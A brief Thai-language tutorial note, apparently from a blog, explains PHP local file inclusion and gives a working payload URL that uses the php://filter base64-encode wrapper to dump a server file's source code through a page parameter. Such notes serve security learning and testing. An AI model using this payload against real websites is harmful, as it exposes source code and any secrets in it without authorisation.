การทำ local file inclusion เพื่ออ่านเนื้อหา code บน server side
Nov 5, 2024
เช่น ถ้า code php เปิดให้สามารถรัน page บน server ได้
/index.php?page=panel.php
เราสามารถใช้
page=php://filter ในการอ่านเนื้อหาไฟล์ แทนที่จะรันไฟล์ได้
เช่น
/index.php?page=php://filter/convert.base64-encode/resource=panel.php
จะเป็นการ print code ของ panel.php ที่ encode base64 ออกมา